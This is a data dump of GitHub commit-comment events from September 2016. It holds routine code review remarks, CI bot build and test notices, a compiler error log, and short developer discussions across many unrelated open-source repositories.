{"id":"4593086387","type":"CommitCommentEvent","actor":{"login":"MigFerreira"},"repo":{"name":"MigFerreira/nodeeditor"},"payload":{"comment":{"id":19105757,"position":12,"line":216,"path":"src/NodeGraphicsObject.cpp","commit_id":"9ebda26996a5a9a0b98f7b20abc06b58706df80b","created_at":"2016-09-20T23:13:48Z","updated_at":"2016-09-20T23:13:48Z","body":"Yes I have noticed this. Will try to solve it tomorrow.\r\nI like the idea that when a node is added it is added as selected (de-selecting any other). Do you agree?"}},"created_at":"2016-09-20T23:13:48Z"}
{"id":"4593086684","type":"CommitCommentEvent","actor":{"login":"tmccormi"},"repo":{"name":"LibreEHR/LibreEHR"},"payload":{"comment":{"id":19105761,"position":null,"line":null,"path":null,"commit_id":"aedc780f7016113b96a6117d51c52b24eabf6f2e","created_at":"2016-09-20T23:13:52Z","updated_at":"2016-09-20T23:13:52Z","body":"Create a new one with the good bit and toss this one"}},"created_at":"2016-09-20T23:13:52Z"}
{"id":"4593086900","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19105763,"position":null,"line":null,"path":null,"commit_id":"f0ad4d118f63f5334be54fab1f77be147491ee5e","created_at":"2016-09-20T23:13:55Z","updated_at":"2016-09-20T23:13:55Z","body":"MoreDayliteFollowup (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1192 of 1192 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0ad4d118f63f5334be54fab1f77be147491ee5e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0ad4d118f63f5334be54fab1f77be147491ee5e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0ad4d118f63f5334be54fab1f77be147491ee5e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.11%25-green.svg)</a>\n"}},"created_at":"2016-09-20T23:13:55Z"}
{"id":"4593088682","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19105770,"position":null,"line":null,"path":null,"commit_id":"fdf3cc2b99ae376a09145407403b51e1b2e5b000","created_at":"2016-09-20T23:14:25Z","updated_at":"2016-09-20T23:14:25Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35756/testReport/) for this commit**"}},"created_at":"2016-09-20T23:14:25Z"}
{"id":"4593088958","type":"CommitCommentEvent","actor":{"login":"yinghe616"},"repo":{"name":"EGP-CIG-REU/aspect"},"payload":{"comment":{"id":19105771,"position":227,"line":204,"path":"source/postprocess/richardson_extrapolation.cc","commit_id":"c14c4018e0e24d5f46c6d64732fb6937b911ef8c","created_at":"2016-09-20T23:14:30Z","updated_at":"2016-09-20T23:14:30Z","body":"did you mean the values are not right if you set like below\r\n204             const QGaussLobatto<dim> quadrature_formula(this->get_parameters().stokes_velocity_degree+1);\r\n205 \r\n206             FEValues<dim> fe_values(this->get_mapping(),\r\n207                                     this->get_fe(),\r\n208                                     quadrature_formula,\r\n209                                     update_values |\r\n210                                     update_quadrature_points |\r\n211                                     update_JxW_values);"}},"created_at":"2016-09-20T23:14:30Z"}
{"id":"4593089027","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19105772,"position":null,"line":null,"path":null,"commit_id":"fdf3cc2b99ae376a09145407403b51e1b2e5b000","created_at":"2016-09-20T23:14:31Z","updated_at":"2016-09-20T23:14:31Z","body":"**[unitTests_php_contractual_responsibilities run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_contractual_responsibilities/8330/testReport/) for this commit**"}},"created_at":"2016-09-20T23:14:31Z"}
{"id":"4593096033","type":"CommitCommentEvent","actor":{"login":"mooneydd"},"repo":{"name":"mooneydd/reflections"},"payload":{"comment":{"id":19105788,"position":null,"line":null,"path":null,"commit_id":"77718ddf2b5e5c19f8deacc8a7a71a3cc770ffd9","created_at":"2016-09-20T23:16:22Z","updated_at":"2016-09-20T23:16:22Z","body":"**When would you want to use a remote repository rather than keeping all your work local?**\r\n\r\nA remote repository is great for collaboration and serves as a cloud backup.  "}},"created_at":"2016-09-20T23:16:22Z"}
{"id":"4593096852","type":"CommitCommentEvent","actor":{"login":"mooneydd"},"repo":{"name":"mooneydd/reflections"},"payload":{"comment":{"id":19105792,"position":null,"line":null,"path":null,"commit_id":"77718ddf2b5e5c19f8deacc8a7a71a3cc770ffd9","created_at":"2016-09-20T23:16:35Z","updated_at":"2016-09-20T23:16:35Z","body":"Respond to first prompt"}},"created_at":"2016-09-20T23:16:35Z"}
{"id":"4593109981","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19105822,"position":null,"line":null,"path":null,"commit_id":"8a10896620af719221150bab6565a98e6bea3cf2","created_at":"2016-09-20T23:20:10Z","updated_at":"2016-09-20T23:20:10Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/514/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2076)."}},"created_at":"2016-09-20T23:20:10Z"}
{"id":"4593113958","type":"CommitCommentEvent","actor":{"login":"jessedearing"},"repo":{"name":"mercul3s/mercedescoyle.com-jekyll"},"payload":{"comment":{"id":19105837,"position":37,"line":37,"path":"blog/_posts/2016-09-18-testing-elixir-http-client-with-exvcr-and-httpoison.md","commit_id":"a4cd071765c4c2aa818b28e6981811216635814a","created_at":"2016-09-20T23:21:13Z","updated_at":"2016-09-20T23:21:13Z","body":"This runs off the side of the page. Also, the IP for the origin seems to be a pingable Oregon-based IP. I don't know if you want to make that public."}},"created_at":"2016-09-20T23:21:13Z"}
{"id":"4593122186","type":"CommitCommentEvent","actor":{"login":"zenithtekla"},"repo":{"name":"zenithtekla/nodeMySQL"},"payload":{"comment":{"id":19105857,"position":null,"line":null,"path":null,"commit_id":"2021a623e4227a1472eddb4218fe65c80c1c9a57","created_at":"2016-09-20T23:23:32Z","updated_at":"2016-09-20T23:23:32Z","body":"- Desired packages:\r\n  + Brunch to solve roadblocks of using SCSS instead of CSS for fast build\r\n     + For simplicity, live-reload and production ready in development process.\r\n  + Angular2-TypeScript for simplicity in the building of reusable UI components instead of individual non-inheritable modules.\r\n  + Isomorphic back-end with Express code refactored to .ts files.\r\n  + Passport Auth\r\n  + Mocha-SuperTest\r\n\r\n- Desired features:\r\n  + SCSS for @extend and mixins.. needs Brunch|Webpack\r\n  + Angular2-TypeScript components\r\n  + Express code converted into .ts\r\n  + Angular2-Universal\r\n  + Adjustment to make sure Sequelize and Mongoose (singleton -https://github.com/outlandishideas/nodejs-mean-with-brunch-sass-passport/blob/master/server.js#L41) work on the application.\r\n- Refs:\r\n  + http://brianflove.com/2016/03/29/typescript-express-node-js/\r\n  + http://stackoverflow.com/questions/36156916/how-to-load-angular-2-with-systemjs-in-a-brunch-io-app\r\n  + angular2-universal-starter looks promising: server, both, client.\r\n  + https://github.com/brunch/brunch/issues/453\r\n  + http://outlandish.com/blog/creating-a-node-js-mean-web-application-with-brunch-sass-and-passport/\r\n  + https://github.com/bapatel1/Learning-Angular-2.0/tree/master/class-7_TwoWayBinding\r\n  + https://justindujardin.github.io/ng2-material/#/\r\n  + http://taswar.zeytinsoft.com/2014/08/05/jade-include-template-inheritance-part-6/\r\n  + https://devcenter.heroku.com/articles/nodejs-mongoose\r\n- pending:\r\n  + review Brunch build tool for SCSS rendering (plugin: sass-brunch)\r\n  + ng2-brunch (repo) is good candidate for impl of sass-brunch (testing required!)\r\n  + ng2-express: turn express into .ts files! review & impl.\r\n  + passport & brunch-sass: review brunch-sass-passport\r\n  + implementation of mocha, supertest -> review koa-viewrendering/test.js for simplified impl."}},"created_at":"2016-09-20T23:23:32Z"}
{"id":"4593124211","type":"CommitCommentEvent","actor":{"login":"martint"},"repo":{"name":"electrum/presto"},"payload":{"comment":{"id":19105862,"position":5,"line":15,"path":"presto-docs/src/main/sphinx/connector/hive-security.rst","commit_id":"549511fc8f34621220f2493e2bd8f58bdfe59f35","created_at":"2016-09-20T23:24:09Z","updated_at":"2016-09-20T23:24:09Z","body":"Why \"legacy\"? That name is not very descriptive"}},"created_at":"2016-09-20T23:24:09Z"}
{"id":"4593124697","type":"CommitCommentEvent","actor":{"login":"gpm777"},"repo":{"name":"gpm777/SCA"},"payload":{"comment":{"id":19105865,"position":null,"line":null,"path":null,"commit_id":"04b1b0088b65180015834ee5dc50af48a129f350","created_at":"2016-09-20T23:24:17Z","updated_at":"2016-09-20T23:24:17Z","body":"  nnn"}},"created_at":"2016-09-20T23:24:17Z"}
{"id":"4593125883","type":"CommitCommentEvent","actor":{"login":"lu-zero"},"repo":{"name":"DonDiego/libav"},"payload":{"comment":{"id":19105870,"position":12,"line":1227,"path":"configure","commit_id":"7489be7312029e4f7c9add4722d43907563e6bcc","created_at":"2016-09-20T23:24:38Z","updated_at":"2016-09-20T23:24:38Z","body":"missing decoder section."}},"created_at":"2016-09-20T23:24:38Z"}
{"id":"4593127064","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19105875,"position":null,"line":null,"path":null,"commit_id":"e97f082787134d2410dd6126aaa69ce865025bc3","created_at":"2016-09-20T23:24:59Z","updated_at":"2016-09-20T23:24:59Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35758/testReport/) for this commit**"}},"created_at":"2016-09-20T23:24:59Z"}
{"id":"4593127129","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19105876,"position":null,"line":null,"path":null,"commit_id":"e97f082787134d2410dd6126aaa69ce865025bc3","created_at":"2016-09-20T23:25:00Z","updated_at":"2016-09-20T23:25:00Z","body":"**[unitTests_php_contractual_responsibilities run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_contractual_responsibilities/8332/testReport/) for this commit**"}},"created_at":"2016-09-20T23:25:00Z"}
{"id":"4593127261","type":"CommitCommentEvent","actor":{"login":"zpao"},"repo":{"name":"facebook/react"},"payload":{"comment":{"id":19105877,"position":22,"line":22,"path":"scripts/babel/transform-object-assign-require.js","commit_id":"1573baaee8ba1c9cd84145b01effcb5eb80503fb","created_at":"2016-09-20T23:25:01Z","updated_at":"2016-09-20T23:25:01Z","body":"You're seeing this when building React? I didn't think we were running this transform on any deps."}},"created_at":"2016-09-20T23:25:01Z"}
{"id":"4593132020","type":"CommitCommentEvent","actor":{"login":"lu-zero"},"repo":{"name":"DonDiego/libav"},"payload":{"comment":{"id":19105881,"position":126,"line":126,"path":"libavcodec/libvc2hqdecode.c","commit_id":"7489be7312029e4f7c9add4722d43907563e6bcc","created_at":"2016-09-20T23:26:28Z","updated_at":"2016-09-20T23:26:28Z","body":"Are those assumptions right?"}},"created_at":"2016-09-20T23:26:28Z"}
{"id":"4593132182","type":"CommitCommentEvent","actor":{"login":"tolleiv"},"repo":{"name":"tolleiv/nuimo-fhem"},"payload":{"comment":{"id":19105883,"position":null,"line":null,"path":null,"commit_id":"dbcd4428c46602901c53fc94a8ccbbe635ea7b3e","created_at":"2016-09-20T23:26:31Z","updated_at":"2016-09-20T23:26:31Z","body":"Closed #1 "}},"created_at":"2016-09-20T23:26:31Z"}
{"id":"4593132424","type":"CommitCommentEvent","actor":{"login":"hlokavarapu"},"repo":{"name":"EGP-CIG-REU/aspect"},"payload":{"comment":{"id":19105885,"position":227,"line":204,"path":"source/postprocess/richardson_extrapolation.cc","commit_id":"c14c4018e0e24d5f46c6d64732fb6937b911ef8c","created_at":"2016-09-20T23:26:36Z","updated_at":"2016-09-20T23:26:36Z","body":"Sorry Ying, please ignore"}},"created_at":"2016-09-20T23:26:36Z"}
{"id":"4593134579","type":"CommitCommentEvent","actor":{"login":"NachoSoto"},"repo":{"name":"jdhealy/Carthage"},"payload":{"comment":{"id":19105889,"position":null,"line":null,"path":null,"commit_id":"8e520a69556082afec8a7c45345c2de9a5d87df4","created_at":"2016-09-20T23:27:14Z","updated_at":"2016-09-20T23:27:14Z","body":":+1:"}},"created_at":"2016-09-20T23:27:14Z"}
{"id":"4593142784","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19105900,"position":null,"line":null,"path":null,"commit_id":"fc59427433eda25acaa347d0e026fc71ad316d7f","created_at":"2016-09-20T23:29:40Z","updated_at":"2016-09-20T23:29:40Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35759/testReport/) for this commit**"}},"created_at":"2016-09-20T23:29:40Z"}
{"id":"4593142853","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19105901,"position":null,"line":null,"path":null,"commit_id":"fc59427433eda25acaa347d0e026fc71ad316d7f","created_at":"2016-09-20T23:29:41Z","updated_at":"2016-09-20T23:29:41Z","body":"**[unitTests_php_contractual_responsibilities run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_contractual_responsibilities/8333/testReport/) for this commit**"}},"created_at":"2016-09-20T23:29:41Z"}
{"id":"4593146845","type":"CommitCommentEvent","actor":{"login":"bengott"},"repo":{"name":"xavcz/apollo-cookie-clicker"},"payload":{"comment":{"id":19105913,"position":null,"line":null,"path":null,"commit_id":"8b873ac313c4cd7f04bd0871bb6f7a0b17bc9b45","created_at":"2016-09-20T23:30:56Z","updated_at":"2016-09-20T23:30:56Z","body":"Eek! Yeah, I only noticed it because I cloned the repo, ran `npm install`, tried to run `meteor`, and got \"run: You're not in a Meteor project directory.\" O rly? ;)"}},"created_at":"2016-09-20T23:30:56Z"}
{"id":"4593149413","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19105920,"position":10,"line":10,"path":"Assignment_2_Vacuum_Cleaner/world/Agent.java","commit_id":"3e6c5b14f1fa6e2e8de23687a9f530cd7e54cf59","created_at":"2016-09-20T23:31:45Z","updated_at":"2016-09-20T23:31:45Z","body":"Too much whitespace here. All you need is 1."}},"created_at":"2016-09-20T23:31:45Z"}
{"id":"4593152098","type":"CommitCommentEvent","actor":{"login":"aethelwulffe"},"repo":{"name":"LibreEHR/LibreEHR"},"payload":{"comment":{"id":19105924,"position":null,"line":null,"path":null,"commit_id":"aedc780f7016113b96a6117d51c52b24eabf6f2e","created_at":"2016-09-20T23:32:30Z","updated_at":"2016-09-20T23:32:30Z","body":"Some of this is already in.  Lots of the little items ring bells in my head though, so this should be checked very closely."}},"created_at":"2016-09-20T23:32:30Z"}
{"id":"4593152448","type":"CommitCommentEvent","actor":{"login":"hlokavarapu"},"repo":{"name":"EGP-CIG-REU/aspect"},"payload":{"comment":{"id":19105925,"position":null,"line":null,"path":null,"commit_id":"417bea8a6d1682057b2c94b18b1cb05533eceb33","created_at":"2016-09-20T23:32:36Z","updated_at":"2016-09-20T23:32:36Z","body":"@yinghe616 \r\nFixed several bugs/issues pointed out by you Ying. \r\n\r\nHowever, when using the benchmark SolKz as a test case, these are the results:\r\n\r\n```\r\nQ2_Q1\r\nGrid_res \tError\t\t\t        Rate\r\n  4\t\t\r\n  5  \t    5.8485108816742e-06\t\r\n  6\t\t3.0438728301639e-06\t0.9421612539169835\t\r\n  7\t\t1.4747553077534e-06\t1.0454324842625553\r\n  8\t\t6.7913768501615e-07\t1.1186996074479243\r\n\r\nQ3_Q2\r\nGrid_res \tError\t\t\t        Rate\r\n  4\t\t\r\n  5  \t    5.1687597957679e-06\r\n  6\t\t2.6113500687157e-06\t0.9850222850541708\r\n  7\t\t1.2691969007587e-06\t1.0408799699421138\r\n  8\t\t5.9371966549259e-07\t1.0960620987588967\r\n\r\n```"}},"created_at":"2016-09-20T23:32:36Z"}
{"id":"4593154146","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"fritteli/gentoo-overlay"},"payload":{"comment":{"id":19105927,"position":null,"line":null,"path":null,"commit_id":"7382297ad0a13599b5af6d5cf5cc4ceced032d11","created_at":"2016-09-20T23:33:07Z","updated_at":"2016-09-20T23:33:07Z","body":"@fritteli FYI, you may be interested in some patches for GitLab that I’ve made for my Alpine package (you can find them [here](https://github.com/jirutka/aports/tree/v3.4/bundles/gitlab-ce)), especially [0006-replace-sys-filesystem.patch](https://github.com/jirutka/aports/blob/v3.4/bundles/gitlab-ce/0006-replace-sys-filesystem.patch)."}},"created_at":"2016-09-20T23:33:07Z"}
{"id":"4593154185","type":"CommitCommentEvent","actor":{"login":"jaxgeller"},"repo":{"name":"callmecavs/xec"},"payload":{"comment":{"id":19105928,"position":null,"line":null,"path":null,"commit_id":"1436a099584535ddc13785a9d79e67eebadc0a2a","created_at":"2016-09-20T23:33:07Z","updated_at":"2016-09-20T23:33:07Z","body":"about time"}},"created_at":"2016-09-20T23:33:07Z"}
{"id":"4593155340","type":"CommitCommentEvent","actor":{"login":"martint"},"repo":{"name":"electrum/presto"},"payload":{"comment":{"id":19105935,"position":5,"line":15,"path":"presto-docs/src/main/sphinx/connector/hive-security.rst","commit_id":"549511fc8f34621220f2493e2bd8f58bdfe59f35","created_at":"2016-09-20T23:33:27Z","updated_at":"2016-09-20T23:33:27Z","body":"In fact, what specifically makes it legacy? Users that don't have any auth infra will want to use it, so it seems legit as a first-class auth type. It'd also be weird for this to be the default value."}},"created_at":"2016-09-20T23:33:27Z"}
{"id":"4593157348","type":"CommitCommentEvent","actor":{"login":"vishvesh"},"repo":{"name":"vishvesh/openstack4j"},"payload":{"comment":{"id":19105944,"position":43,"line":111,"path":"core-test/src/main/java/org/openstack4j/api/tacker/v1/TackerVimTests.java","commit_id":"6160624e2fd1879139a477cb7682e097aad2a682","created_at":"2016-09-20T23:34:02Z","updated_at":"2016-09-20T23:34:02Z","body":"Lol.. That wasn't for you.. :) Sorry forgot to remove it :D\r\n\r\nWill probably remove it in future PRs :)"}},"created_at":"2016-09-20T23:34:02Z"}
{"id":"4593160293","type":"CommitCommentEvent","actor":{"login":"cpdurham"},"repo":{"name":"torch/cutorch"},"payload":{"comment":{"id":19105957,"position":null,"line":null,"path":null,"commit_id":"a0608f6331fc82cacd6ee3285f338c62406529a1","created_at":"2016-09-20T23:34:56Z","updated_at":"2016-09-20T23:34:56Z","body":"I think this just broke something, just installed torch from a clean system and got:\r\n\r\n```\r\n/tmp/luarocks_cutorch-scm-1-204/cutorch/lib/THC/THCTensorIndex.cu(207): error: cannot overload functions distinguished by return type alone\r\n\r\n1 error detected in the compilation of \"/tmp/tmpxft_000020ce_00000000-5_THCTensorIndex.cpp4.ii\".\r\nCMake Error at THC_generated_THCTensorIndex.cu.o.cmake:267 (message):\r\n  Error generating file\r\n  /tmp/luarocks_cutorch-scm-1-204/cutorch/build/lib/THC/CMakeFiles/THC.dir//./THC_generated_THCTensorIndex.cu.o\r\n\r\n\r\nlib/THC/CMakeFiles/THC.dir/build.make:161: recipe for target 'lib/THC/CMakeFiles/THC.dir/THC_generated_THCTensorIndex.cu.o' failed\r\nmake[2]: *** [lib/THC/CMakeFiles/THC.dir/THC_generated_THCTensorIndex.cu.o] Error 1\r\nmake[2]: *** Waiting for unfinished jobs....\r\nCMakeFiles/Makefile2:172: recipe for target 'lib/THC/CMakeFiles/THC.dir/all' failed\r\nmake[1]: *** [lib/THC/CMakeFiles/THC.dir/all] Error 2\r\nMakefile:127: recipe for target 'all' failed\r\nmake: *** [all] Error 2\r\n\r\nError: Build error: Failed building.\r\n```"}},"created_at":"2016-09-20T23:34:56Z"}
{"id":"4593172813","type":"CommitCommentEvent","actor":{"login":"sholladay"},"repo":{"name":"sindresorhus/find-up"},"payload":{"comment":{"id":19105994,"position":null,"line":null,"path":null,"commit_id":"31cd65dd389aec2c77ccab14d4c97e07427cc299","created_at":"2016-09-20T23:38:41Z","updated_at":"2016-09-20T23:38:41Z","body":"I somewhat spurred this because #7 made a small change to a [corner case](https://github.com/sindresorhus/find-up/issues/8#issuecomment-242986611) in such a way that probably deserves semver major, even though it was borderline user error. At that point, might as well go ahead and do this.\r\n\r\nI will volunteer to do any maintenance work within the next few months (the LTS window) if someone really needs it. But this module is actually super stable and you almost certainly won't notice a difference with the `1.x` versions.\r\n\r\nAlso, to be clear, SIndre does [say no sometimes](https://github.com/sindresorhus/opn/issues/30#issuecomment-233925605). 😄 "}},"created_at":"2016-09-20T23:38:41Z"}
{"id":"4593175429","type":"CommitCommentEvent","actor":{"login":"jdhealy"},"repo":{"name":"jdhealy/Carthage"},"payload":{"comment":{"id":19106002,"position":null,"line":null,"path":null,"commit_id":"8e520a69556082afec8a7c45345c2de9a5d87df4","created_at":"2016-09-20T23:39:26Z","updated_at":"2016-09-20T23:39:26Z","body":"@NachoSoto psst, actual repo ➜ https://github.com/Carthage/Carthage/commit/8e520a69556082afec8a7c45345c2de9a5d87df4#commitcomment-19105889 🙃🙃🙃"}},"created_at":"2016-09-20T23:39:26Z"}
{"id":"4593177288","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaData/DataStreams.jl"},"payload":{"comment":{"id":19106007,"position":63,"line":73,"path":"docs/src/index.md","commit_id":"359240329728cdf7d784a78316f8c409ab97a614","created_at":"2016-09-20T23:39:55Z","updated_at":"2016-09-20T23:39:55Z","body":"If you're breaking API, why are you only changing patch release version?"}},"created_at":"2016-09-20T23:39:55Z"}
{"id":"4593181240","type":"CommitCommentEvent","actor":{"login":"gschmidt-usgs"},"repo":{"name":"USGS-EROS/espa-processing"},"payload":{"comment":{"id":19106022,"position":null,"line":null,"path":null,"commit_id":"685d4c75eebe12c2e69137aaaf8863fd6a859f20","created_at":"2016-09-20T23:41:05Z","updated_at":"2016-09-20T23:41:05Z","body":"These changes look appropriate based on the bounding coordinate handling of the scenes that cross the 180 meridian."}},"created_at":"2016-09-20T23:41:05Z"}
{"id":"4593182030","type":"CommitCommentEvent","actor":{"login":"arilitan"},"repo":{"name":"react-native-community/react-native-video"},"payload":{"comment":{"id":19106023,"position":null,"line":null,"path":null,"commit_id":"6dfbb1e2a57863d249e78c68aa79fc1ca34e118d","created_at":"2016-09-20T23:41:18Z","updated_at":"2016-09-20T23:41:18Z","body":"@nharlow89 @mattapperson Hey thanks for this fix, it saved me from a terrible bug! It seems there is a possible race condition where removing the mMediaPlayer somehow triggers a pause on a nulled mMediaPlayer. [See this stackoverflow thread](http://stackoverflow.com/questions/12769996/unable-to-pause-activity-illegal-state-exception-while-playing-bgm-in-android) for someone detailing this issue "}},"created_at":"2016-09-20T23:41:18Z"}
{"id":"4593188928","type":"CommitCommentEvent","actor":{"login":"gschmidt-usgs"},"repo":{"name":"USGS-EROS/espa-elevation"},"payload":{"comment":{"id":19106036,"position":null,"line":null,"path":null,"commit_id":"d7464bd40ce4d5753e325f1866be84f42acb4c5c","created_at":"2016-09-20T23:43:17Z","updated_at":"2016-09-20T23:43:17Z","body":"These changes look appropriate based on the bounding coordinate handling of the scenes that cross the 180 meridian."}},"created_at":"2016-09-20T23:43:17Z"}
{"id":"4593191709","type":"CommitCommentEvent","actor":{"login":"gschmidt-usgs"},"repo":{"name":"USGS-EROS/espa-l2qa-tools"},"payload":{"comment":{"id":19106045,"position":null,"line":null,"path":null,"commit_id":"e8ff05ae403f53828d62d913b6ce8f5e0eae0d3c","created_at":"2016-09-20T23:44:08Z","updated_at":"2016-09-20T23:44:08Z","body":"Changes look good."}},"created_at":"2016-09-20T23:44:08Z"}
{"id":"4593192732","type":"CommitCommentEvent","actor":{"login":"aleclarson"},"repo":{"name":"facebook/react"},"payload":{"comment":{"id":19106047,"position":22,"line":22,"path":"scripts/babel/transform-object-assign-require.js","commit_id":"1573baaee8ba1c9cd84145b01effcb5eb80503fb","created_at":"2016-09-20T23:44:24Z","updated_at":"2016-09-20T23:44:24Z","body":"It seems the React Native packager is reading `react/.babelrc` (which is expected, right?)"}},"created_at":"2016-09-20T23:44:24Z"}
{"id":"4593194239","type":"CommitCommentEvent","actor":{"login":"Mwnesbitt"},"repo":{"name":"MrChrisJ/fullnode"},"payload":{"comment":{"id":19106051,"position":null,"line":null,"path":null,"commit_id":"136a4126fe0705c1d2a6f1ac07107835886c3812","created_at":"2016-09-20T23:44:51Z","updated_at":"2016-09-20T23:44:51Z","body":"Do you know if this issue can occur even with an updated version of raspbian?  I'm fairly confident I have the most recent version, and I entered \r\nsudo apt-get update\r\nsudo apt-get upgrade\r\nsudo apt-get dist-upgrade \r\njust to be sure.  My installation says I'm running version 8.0.  Do I need to upgrade?  Is there a way to do it without completely starting with a fresh pi?"}},"created_at":"2016-09-20T23:44:51Z"}
{"id":"4593195094","type":"CommitCommentEvent","actor":{"login":"quozl"},"repo":{"name":"quozl/cforth-1"},"payload":{"comment":{"id":19106053,"position":null,"line":null,"path":null,"commit_id":"9d3d888af88428ed460c5dd217f6a8dbf5c57a1e","created_at":"2016-09-20T23:45:08Z","updated_at":"2016-09-20T23:45:08Z","body":"Thanks.  Everything fine now.\r\n\r\nYes, it was a rapid-fire connection test.  Repeating the test much more slowly, there's no leak.  Watching heap over time shows things being released.  About 121 seconds is needed to recover from one inbound connection closed by remote host, with a cost of 208 bytes.  That's with TCP_MSL default of a minute.\r\n\r\n```\r\n: watch-heap\r\n   begin\r\n      get-ticks .d  heap-size dup .d  cr  ( old )\r\n      begin\r\n         key?  if  drop exit  then\r\n         d# 100 ms  heap-size  over <>\r\n      until\r\n      drop\r\n   again\r\n;\r\n```\r\n\r\n#define TCP_MSL 60000\r\n```\r\n874990660 27904 \r\n995942438 28112      <-- recovery time 121 seconds\r\n1055211747 27904 \r\n1176464003 28112     <-- recovery time 121 seconds\r\n```\r\n\r\n#define TCP_MSL 2000\r\n```\r\n28392171 31392 \r\n48916885 30656 \r\n53222070 30864      <-- recovery time 4.3 seconds\r\n412671677 30656 \r\n416877270 30864     <-- recovery time 4.2 seconds\r\n```\r\n\r\n(Of course, reducing TCP_MSL like this would break long distance connections over very slow links)."}},"created_at":"2016-09-20T23:45:08Z"}
{"id":"4593195758","type":"CommitCommentEvent","actor":{"login":"gschmidt-usgs"},"repo":{"name":"USGS-EROS/espa-l2qa-tools"},"payload":{"comment":{"id":19106056,"position":null,"line":null,"path":null,"commit_id":"bb420cd742de52fbc736dad579e5509b7a5d77b7","created_at":"2016-09-20T23:45:19Z","updated_at":"2016-09-20T23:45:19Z","body":"Changes look good."}},"created_at":"2016-09-20T23:45:19Z"}
{"id":"4593196571","type":"CommitCommentEvent","actor":{"login":"ronawho"},"repo":{"name":"chapel-lang/chapel"},"payload":{"comment":{"id":19106058,"position":18,"line":46,"path":"runtime/src/chpl-privatization.c","commit_id":"121463b59c5f83a64e4ff82d9726243e98cb9d2e","created_at":"2016-09-20T23:45:32Z","updated_at":"2016-09-20T23:45:32Z","body":"I wonder if we can check `if (chpl_privateObjects == NULL)` instead"}},"created_at":"2016-09-20T23:45:32Z"}
{"id":"4593197701","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19106062,"position":1,"line":8,"path":"modules/csharp/main.cc","commit_id":"420e8a4a7962e339cbc0e5b950ea894cf63e3cb3","created_at":"2016-09-20T23:45:53Z","updated_at":"2016-09-20T23:45:53Z","body":"@MichaelWallace30 \r\nThis is a testing file in case we need to work with the middleware of the C# wrapper."}},"created_at":"2016-09-20T23:45:53Z"}
{"id":"4593200063","type":"CommitCommentEvent","actor":{"login":"vikram-redhat"},"repo":{"name":"openshift/openshift-docs"},"payload":{"comment":{"id":19106072,"position":292,"line":292,"path":"install_config/registry/deploy_registry_existing_clusters.adoc","commit_id":"94eef9ec6a9cbd8ef0196760accfe0dcb2475c7d","created_at":"2016-09-20T23:46:32Z","updated_at":"2016-09-20T23:46:32Z","body":"@adellape - this errant endif is causing build issues, and I have removed it to get the build for install config guide to work. Not sure if this endif is missing a corresponding ifdef or not, so I apologize. Feel free to put it back with the right ifdef if needed."}},"created_at":"2016-09-20T23:46:32Z"}
{"id":"4593201622","type":"CommitCommentEvent","actor":{"login":"dagochen"},"repo":{"name":"classicdb/database"},"payload":{"comment":{"id":19106078,"position":null,"line":null,"path":null,"commit_id":"9ad062499da2e91dfc7b8d05855ea099bbacdf7e","created_at":"2016-09-20T23:46:59Z","updated_at":"2016-09-20T23:46:59Z","body":"@Tobschinski @cala \r\nWhat were the proofs and sources for this commit with the black rumsey rum?\r\n"}},"created_at":"2016-09-20T23:46:59Z"}
{"id":"4593208529","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19106093,"position":null,"line":null,"path":null,"commit_id":"a5ac2b4e5857398fdb7d7ffe4cf9d2dd133d3e0e","created_at":"2016-09-20T23:48:59Z","updated_at":"2016-09-20T23:48:59Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35762/testReport/) for this commit**"}},"created_at":"2016-09-20T23:48:59Z"}
